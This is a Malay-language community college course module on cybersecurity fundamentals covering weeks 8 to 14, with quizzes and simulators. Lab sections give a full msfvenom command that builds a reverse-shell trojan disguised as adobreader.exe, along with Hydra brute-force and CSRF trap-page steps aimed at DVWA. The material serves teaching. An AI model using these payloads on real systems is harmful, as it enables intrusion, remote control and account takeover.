Public (Terbuka/Awam) Boleh diakses secara bebas oleh sesiapa sahaja tanpa sekatan. Tiada risiko kerugian. Brosur pendaftaran program pengajian, kenyataan media cuti semester di FB kolej.

4.1.3 Dokumen Polisi Keselamatan

Dokumen polisi ialah teks formal bertulis yang mengandungi undang-undang dalaman organisasi yang wajib dipatuhi oleh pekerja. Dokumen ini mentakrifkan standard kata laluan, akses peranti, tindakan tatatertib pelanggaran keselamatan, dan proses pemulihan data.

Aktiviti Interaktif: Pengelasan Maklumat Pelajar

Pilih label klasifikasi yang sesuai untuk jenis dokumen berikut:

Skrip Jawapan / Soalan Peperiksaan Akhir
Brosur Iklan Syarat Kemasukan Pelajar Kolej
Uji Minda Minggu 8
1. Pengelasan maklumat dalam organisasi bertujuan untuk:
A) Mengurus keutamaan dan kos perlindungan data mengikut tahap sensitivitinya.
B) Membolehkan semua staf membaca semua dokumen organisasi tanpa had.
C) Menghapuskan fail yang berusia lebih 5 tahun secara automatik.
KATA KUNCI
Governance = Rangka kerja pengurusan.
Confidential = Rekod peperiksaan / Data peribadi.
MINGGU 9 • TOPIK 4.1 (PART 2)

Hak Akses Fail & Perlindungan Kredibel

Mengurus kawalan hak akses fail sistem, struktur kata laluan pintar, dan kaedah perlindungan data fizikal/digital.

Masa Pembelajaran: 2 Jam Kuliah, 3 Jam Amali
CLO 1 (P3)

4.1.4 Pengurusan Nama Pengguna & Kata Laluan

Kredibiliti akaun pengguna adalah garisan pertama pertahanan organisasi. Dasar password yang kukuh wajib diamalkan:

  • Kompleksiti: Menggunakan sekurang-kurangnya 12 aksara yang menggabungkan huruf besar, huruf kecil, nombor, dan simbol khas (contoh: `@`, `#`, `!`).
  • Kitaran Hayat (Expiration): Kata laluan wajib ditukar setiap 90 hari untuk mengelakkan penyalahgunaan akaun lama.
  • Polisi Lockout: Akaun disekat secara automatik selama 30 minit jika terdapat kesilapan kata laluan sebanyak 3 kali berturut-turut untuk menghalang serangan *brute-force*.

4.1.5 Hak Akses Fail & Folder (Permissions)

Mengamalkan prinsip **Least Privilege** (hak akses minimum). Staf hanya dibenarkan mengakses fail yang diperlukan untuk tugas harian mereka sahaja. Hak akses dalam sistem fail terdiri daripada:

  • Read (r): Kebenaran untuk membuka dan melihat isi kandungan fail atau folder.
  • Write (w): Kebenaran untuk mencipta, mengubah, mengedit, atau menulis semula fail atau folder.
  • Execute (x): Kebenaran untuk menjalankan program aplikasi atau fail skrip di dalam memori komputer.

4.1.6 Kaedah Melindungi Data (Authentication)

  1. Data Encryption (Penyulitan Data): Proses algoritma menukar teks biasa (*plain text*) yang boleh dibaca kepada aksara rawak disulitkan (*cipher text*) bagi menjamin kerahsiaan data.
  2. Security Tokens: Penggunaan token fizikal atau peranti pintar penjana nombor pengesahan sementara secara rawak (contoh: OTP).
  3. Biometrics: Pengenalan biologi manusia seperti pengimbas cap jari, wajah, dan anak mata (*iris scan*) yang unik dan tidak boleh dikongsi.
  4. Multi-Factor Authentication (MFA): Menggabungkan dua atau lebih kaedah pengesahan identiti (sesuatu yang anda tahu, miliki, atau ada pada biologi anda) sebelum keizinan masuk diberikan.
Kalkulator Hak Akses Linux (chmod)

Sistem Linux menggunakan nilai oktal untuk mewakili kebenaran Read (4), Write (2), dan Execute (1). Cuba tandakan kebenaran di bawah untuk melihat kod perintah **chmod**:

Owner


Group


Others


Kod chmod: 644
Uji Minda Minggu 9
1. Konsep Multi-Factor Authentication (MFA) mewajibkan kemasukan:
A) Gabungan sekurang-kurangnya dua kaedah pengesahan dari kategori berbeza (cth: PIN bank + cap jari).
B) Kata laluan yang ditukar sekurang-kurangnya 3 kali berturut-turut.
C) Dua alamat e-mel berasingan dari platform penyedia berbeza.
KATA KUNCI
Least Privilege = Hak akses minimum harian.
chmod 755 = rwx bagi owner, rx bagi group dan others.
MINGGU 10 • TOPIK 4.2 (PART 1)

Polisi Penggunaan & Amali Windows Policy

Memahami kepentingan dasar penggunaan komputer kolej, dan cara mengaktifkan sepanduk amaran sebelum log masuk Windows.

Masa Pembelajaran: 2 Jam Kuliah, 3 Jam Amali
CLO 1 (P3) • Panduan Langkah Amali

4.2.1 Acceptable Use Policy (AUP)

AUP ialah dokumen perjanjian rasmi antara organisasi (Kolej Komuniti) dan pengguna (pelajar/staf) yang menetapkan peraturan bertulis mengenai cara penggunaan komputer, rangkaian, dan internet kolej secara beretika. AUP **melarang keras** pemasangan perisian cetak rompak, melayari laman web tidak senonoh, dan aktiviti pencerobohan siber.

4.2.2 Polisi Akses Fizikal (Physical Access Policies)

Peraturan ketat untuk menghalang penceroboh daripada melintasi zon fizikal pejabat:

  • Tailgating Prohibited: Larangan menahan pintu keselamatan bagi membolehkan orang di belakang melintas bersama tanpa mengimbas kad akses mereka sendiri (walaupun kenal). Setiap orang mesti mengimbas kad.
  • Pas Pelawat: Tetamu luar mesti mendaftar masuk di kaunter pengawal keselamatan, memakai pas pelawat, dan sentiasa diiringi oleh kakitangan kolej sepanjang berada di kawasan sensitif.

Amali 8: Mengkonfigurasi Sepanduk Amaran Logon Windows (secpol.msc)

Mengikut standard tadbir urus keselamatan, komputer pejabat mesti memaparkan amaran undang-undang sebelum pengguna dibenarkan menaip kata laluan log masuk. Ini bertindak sebagai perjanjian undang-undang. Ikuti langkah di bawah pada sistem operasi Windows 10/11:

  1. Tekan pintasan keyboard Win + R, taip arahan secpol.msc, dan tekan Enter untuk membuka **Local Security Policy**.
  2. Pada panel kiri, navigasi to: Local PoliciesSecurity Options.
  3. Pada senarai dasar di panel kanan, cari entri: Interactive logon: Message title for users attempting to log on. Klik dua kali dan masukkan tajuk amaran (cth: AMARAN KESELAMATAN). Klik OK.
  4. Seterusnya, cari entri: Interactive logon: Message text for users attempting to log on. Klik dua kali dan taip teks amaran undang-undang:
    "AMARAN: Sistem komputer ini dikhaskan untuk kakitangan berkuasa Kolej Komuniti Papar sahaja. Aktiviti anda dipantau."
  5. Klik Apply, kemudian OK. Uji dengan mengunci skrin Windows menggunakan pintasan Win + L.
Simulator Local Security Policy (secpol.msc)

Mari kita simulasikan arahan Windows Local Security Policy. Ikuti arahan berikut:

Security Settings
Account Policies
Local Policies
Security Options
Interactive logon: Message title for users... Not Defined
Interactive logon: Message text for users... Not Defined
Previu Windows Lock Screen Anda

(Tiada Banner)

Sila konfigurasikan tetapan dasar keselamatan di atas terlebih dahulu.

Uji Minda Minggu 10
1. Dari aspek undang-undang dan tadbir urus siber, apakah fungsi utama sepanduk amaran sebelum skrin log masuk Windows diaktifkan?
A) Bertindak sebagai digital contract di mana pengguna bersetuju mematuhi dasar organisasi sebelum mengakses sistem.
B) Mempercepatkan proses memuat turun fail Windows Update.
C) Menjimatkan penggunaan tenaga skrin komputer.
KATA KUNCI
AUP = Dasar Penggunaan Boleh Terima.
secpol.msc = Console Local Security Policy di Windows.
MINGGU 11 • TOPIK 4.2 (PART 2)

Siasatan Insiden Keselamatan Fizikal

Mempelajari cara mentafsir log keselamatan fizikal untuk mengesan pencerobohan dan pelanggaran dasar (Tailgating).

Masa Pembelajaran: 2 Jam Kuliah, 3 Jam Amali
CLO 1 (P3)

Mengapa Log Akses Amat Kritikal?

Apabila berlaku insiden pencerobohan (contohnya: perkakasan PC dicuri dari makmal komputer), penganalisis keselamatan tidak boleh sekadar meneka. Mereka mesti meneliti fail log dari pelbagai sistem kawalan akses (Access Control Logs). Log ini bertindak sebagai bukti audit (*audit trail*).

Mengesan Pencerobohan Tailgating (Mengekor)

Tailgating berlaku apabila pekerja yang sah menyapu kad akses pintu dan masuk, manakala penceroboh memegang pintu terbuka dan mengekori mereka dari belakang tanpa menyapu kad sendiri. Kita boleh menyiasat insiden ini dengan membandingkan log akses pintu biometrik dengan rakaman CCTV:

Masa Log Nama Staf / Kad ID Pintu Makmal Status Pengesahan
09:00:12 AM Ahmad (Staf) - ID: 102 Pintu Utama A AKSES DIBENARKAN (Cap Jari)
09:00:15 AM *Tiada Rekod Pengesahan* Pintu Utama A PENCEROBOHAN TAILGATING (CCTV dapati 2 orang masuk)
09:05:00 AM Fatimah (Staf) - ID: 105 Pintu Utama A AKSES DIBENARKAN (Cap Jari)

Tindakan Mitigasi Tailgating

  1. Pendidikan Pekerja: Latihan berkala mengenai risiko membiarkan pintu terbuka kepada orang luar (dasar "Satu Sapuan, Satu Orang").
  2. Pemasangan Mantraps / Turnstiles: Menggunakan struktur fizikal pintu berkembar berpusing (seperti di pintu MRT) di mana hanya satu orang sahaja boleh melintas pada satu-satu masa.
  3. Pemasangan Penderia Haba (Thermal Sensors): Sensor moden di atas pintu keselamatan yang boleh mengira jumlah kepala manusia yang melintasi pintu dan membunyikan penggera jika melebihi kad pengimbas.
Alat Interaktif: Siasatan Log Akses

Seorang suspek disyaki menceroboh bilik server Kolej Komuniti pada jam **11:00 PM**. Sila semak log akses pintu di bawah dan pilih siapakah staf yang bertanggungjawab secara cuai membiarkan penceroboh masuk (Tailgating):

Masa Log Staf Tindakan Log Tindakan Anda
10:55 PM Hassan (Admin) Scan kad & masuk bilik server
10:58 PM Syed (Pensyarah) Scan kad, masuk & keluar (pintu dibiar terbuka)
Uji Minda Minggu 11
1. Antara struktur perlindungan fizikal berikut, yang manakah direka khusus untuk menghalang serangan tailgating dengan membenarkan hanya satu orang sahaja melintas pada satu masa?
A) Mantraps / Turnstiles
B) Kamera CCTV Digital
C) Bilik kebal kalis api
INGAT!
Biarpun anda kenal rakan sekerja, sentiasa minta mereka mengimbas kad akses pintu mereka sendiri untuk mematuhi integriti rekod log audit!
MINGGU 12 • TOPIK 4.3 (PART 1)

Pendedahan Alatan: Wireshark

Mempelajari teknik pencerapan dan analisis paket rangkaian digital menggunakan penganalisis protokol Wireshark.

Masa Pembelajaran: 2 Jam Kuliah, 3 Jam Amali
CLO 1 (P3) • Amali Makmal

4.3.2 Protokol Rangkaian & Wireshark

**Wireshark** ialah penganalisis protokol rangkaian (*packet sniffer*) sumber terbuka standard industri. Ia menangkap trafik data secara langsung (*live packet capture*) yang sedang mengalir melalui kad rangkaian komputer. Ciri utama Wireshark:

  • Packet Capture (Pencerapan Paket): Menangkap aliran paket data TCP, UDP, DNS, HTTP, dll., daripada kad rangkaian (Ethernet/Wi-Fi).
  • Packet Filtering: Menyaring ribuan paket data untuk mencari paket yang dikehendaki dengan menulis skrip penapis (cth: `http` untuk menapis protokol web sahaja).
  • Password Sniffing (Bahaya HTTP): Menunjukkan bahaya menggunakan laman web HTTP tanpa penyulitan (plain text). Wireshark boleh mendedahkan kata laluan log masuk mangsa secara terang-terangan jika dihantar melalui kaedah HTTP POST.

Amali 9: Analisis Protokol & Penapisan Paket Menggunakan Wireshark

  1. Buka terminal Kali Linux, taip arahan wireshark dan tekan **Enter**.
  2. Pilih antara muka rangkaian aktif (cth: eth0) dan klik ikon sirip jerung biru untuk mula menangkap paket.
  3. Buka pelayar web, layari laman web log masuk HTTP yang tidak disulitkan (contoh: http://testphp.vulnweb.com/login.php) dan taip nama pengguna serta kata laluan palsu. Tekan Submit.
  4. Kembali ke Wireshark, tekan butang henti (butang merah) pencerapan paket.
  5. Pada baris penapis (*Filter Bar*), taip arahan: http.request.method == "POST" dan tekan Enter.
  6. Klik pada baris paket HTTP POST yang dijumpai, kembangkan bahagian **HTML Form URL Encoded** di panel butiran bawah. Anda akan melihat parameter data yang dihantar (cth: uname=admin&pass=PaparCyber2026!).
Simulator Wireshark (Mencari Parameter POST)

Cuba taip penapis http.request.method == "POST" di baris penapis Wireshark di bawah untuk menyaring paket dan klik pada paket yang muncul untuk mengekstrak data:

10.0021192.168.18.1192.168.18.138DNSStandard query 0x12a3 A testphp.vulnweb.com
20.0450192.168.18.137192.168.18.138TCP80 -> 45672 [SYN, ACK] Seq=0 Ack=1
30.0890192.168.18.137192.168.18.138HTTPPOST /login.php HTTP/1.1 (application/x-www-form-urlencoded)
Sila pilih/klik pada satu-satu paket di atas untuk melihat butiran decoding...
Amali 12.2: Serangan Brute Force (Menggunakan Hydra)

Serangan Brute Force meneka kombinasi nama pengguna dan kata laluan secara pukal menggunakan senarai kamus (*dictionary list*) sehingga padanan yang betul ditemui.

Pautan Lembaran Kerja: Panduan langkah demi langkah brute force di Kali Linux boleh didapati di:
Lembaran_Kerja_Brute_Force.md
  1. Pilih menu Brute Force di DVWA.
  2. Dapatkan Cookie PHPSESSID anda melalui Developer Tools (F12).
  3. Buka terminal Kali Linux, taip arahan hydra dengan parameter kuki sesi dan senarai kata laluan sasaran untuk memecah masuk akaun admin.
Uji Minda Minggu 12
1. Mengapakah penghantaran kata laluan menggunakan protokol HTTP (bukan HTTPS) berbahaya kepada keselamatan data?
A) Kerana data dihantar secara teks biasa (plain text) tanpa penyulitan dan mudah dicuri oleh penganalisis paket Wireshark.
B) Kerana ia mengambil masa yang sangat lama untuk diproses oleh web server.
C) Kerana HTTP memerlukan pemasangan kad grafik yang berkuasa tinggi.
INGAT!
Sentiasa pastikan laman web perbankan atau log masuk peribadi anda bermula dengan HTTPS yang menyulitkan data daripada dicuri penceroboh.
MINGGU 13 • TOPIK 4.3 (PART 2)

Digital Forensik & Penyalahgunaan Msfvenom

Melaksanakan amali pemulihan fail terpadam menggunakan Autopsy dan memahami bahaya trojan menggunakan Msfvenom.

Masa Pembelajaran: 3 Jam Amali Makmal
CLO 1 (P3) • Amali Makmal

Amali 10: Pemulihan Fail Terpadam & Forensik Digital (Autopsy)

Apabila pengguna memadam fail biasa daripada Windows Explorer (bukan Recycle Bin), sistem operasi hanya memadamkan penunjuk fail (*pointer*), manakala data sebenar masih wujud di sektor pemacu sehinggalah ia ditulis ganti oleh fail baharu. Kita boleh memulihkan fail terpadam menggunakan alat **Autopsy**:

  1. Pasang dan buka **Autopsy** (Jalankan sebagai *Administrator* di Windows).
  2. Klik **New Case** dan beri nama kes (cth: Kes_001).
  3. Pilih jenis punca data (**Data Source**), iaitu *Local Disk* yang menghala ke pemacu USB (pendrive) latihan anda.
  4. Nyahaktifkan ingest module yang tidak berkaitan untuk mempercepatkan pengimbasan, kemudian klik **Next**.
  5. Kembangkan senarai pada panel kiri di bawah: File TypesDeleted Files.
  6. Cari nama fail atau gambar terpadam anda. Klik kanan pada fail tersebut dan pilih **Extract File(s)** untuk menyimpannya kembali ke komputer.
DELETION VS WIPING
Data Deletion (Pemadaman): Hanya memadam penunjuk fail. Data mudah dipulihkan.
Data Wiping (Penyahpadaman): Menulis semula sektor pemacu cakera keras berulang kali dengan bit rawak (0 atau 1). Fail **tidak boleh dipulihkan semula** dengan sebarang perisian forensik.

Amali Trojan Msfvenom (Penunjuk Bahaya)

Penyerang boleh menyamar sebagai perisian sah (seperti PDF Reader) dengan memasukkan kod trojan berbahaya menggunakan arahan Msfvenom:

sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP Kali Linux] LPORT=4444 -f exe > adobreader.exe

Apabila mangsa tertipu dan menjalankan fail `adobreader.exe`, ia akan membuka sambungan pintu belakang ke terminal Kali Linux penyerang secara automatik. Penyerang boleh mengambil alih kamera web, melihat skrin mangsa melalui arahan screenshare, dan memadam fail penting mangsa.

Simulator Siasatan Forensik Autopsy

Klik folder **Deleted Files** di panel kiri Autopsy di bawah untuk memaparkan gambar terpadam dan tekan butang **Extract** untuk memulihkannya:

📂 Data Sources
📂 Deleted Files
📂 File Search
Nama FailStatusSaizTindakan
Sila pilih folder Deleted Files di panel kiri
Amali 13.3: Cross-Site Request Forgery (CSRF)

CSRF menipu pelayan web untuk mempercayai permintaan yang dihantar oleh pelayar mangsa bagi pihak penyerang (contohnya menukar kata laluan mangsa secara automatik apabila melawat laman web perangkap luar).

Pautan Lembaran Kerja: Amali serangan CSRF boleh didapati di:
Lembaran_Kerja_CSRF.md
  1. Pilih menu CSRF di DVWA dan kaji struktur URL penukaran kata laluan.
  2. Bina fail HTML perangkap yang mengandungi tag imej tersembunyi (<img>) menghala ke link penukaran tersebut.
  3. Buka fail perangkap pada pelayar yang sama yang sedang log masuk DVWA untuk menguji pintasan pertukaran kata laluan secara automatik.
Uji Minda Minggu 13
1. Apakah perbezaan utama antara proses "Deletion" (Pemadaman biasa) dan "Wiping" pada pemacu cakera keras?
A) Deletion hanya memadam penunjuk fail (boleh dipulihkan), manakala Wiping menulis ganti seluruh sektor cakera dengan bit rawak (tidak boleh dipulihkan).
B) Deletion merosakkan fizikal cakera keras, manakala Wiping adalah program virus.
C) Tiada sebarang perbezaan antara kedua-duanya.
KATA KUNCI
Autopsy = Perisian Forensik Digital.
Meterpreter = Payload interaktif kawalan jauh.
MINGGU 14 • ULANGKAJI PEPERIKSAAN

Kesedaran Siber & Uji Minda Akhir

Ringkasan amalan kesedaran siber organisasi (Clean Desk Policy) dan modul persediaan Peperiksaan Akhir Kursus (30%).

Masa Pembelajaran: 2 Jam Kuliah, 3 Jam Amali
CLO 3 (A2) • Persediaan Final Assessment

4.4 Latihan & Program Kesedaran Siber

Kajian menunjukkan bahawa **85% pencerobohan siber bermula daripada kecuaian manusia** (Human Error). Oleh itu, organisasi perlu mendidik kakitangan melalui program kesedaran siber berkala:

  • Clean Desk Policy (Dasar Meja Bersih): Peraturan yang melarang pekerja meninggalkan dokumen sensitif terdedah di atas meja pejabat, atau menampal kertas pelekat (*sticky notes*) kata laluan log masuk pada monitor komputer selepas habis waktu bekerja. Semua fail mesti disimpan di dalam laci berkunci.
  • Bahaya USB Drops (Pancingan USB): Taktik penggodam yang mencampakkan pemacu USB yang telah disuntik malware secara sengaja di persekitaran tempat letak kereta kolej. Kakitangan dilarang keras memungut dan mencucuk pemacu USB yang tidak dikenali ke dalam komputer pejabat.

Format Peperiksaan Akhir (Final Assessment - 30%)

Peperiksaan bertulis merangkumi soalan subjektif dan objektif meliputi keseluruhan Topik 1.0 sehingga Topik 4.0. Pastikan anda menguasai istilah penting dalam CIA Triad, jenis ancaman, konfigurasi Windows Policy, dan alatan keselamatan.

Uji Minda Akhir (Persediaan Peperiksaan)
1. Apabila anda menggunakan pemandu kilat (USB) yang sengaja dicampakkan di tapak parkir kereta dan ia menjangkiti komputer kolej, taktik kejuruteraan sosial manakah ini?
A) Baiting (Umpan USB)
B) Eavesdropping
C) Phishing
2. Dasar keselamatan manakah yang melarang anda meninggalkan catatan kata laluan pada monitor skrin komputer?
A) Acceptable Use Policy
B) Clean Desk Policy
C) Hardening Policy
TAHNIAH!
Anda telah menyelesaikan keseluruhan 14 minggu kuliah dan amali bagi subjek SFC31663 Cybersecurity Fundamentals. Semoga anda berjaya dalam Peperiksaan Akhir!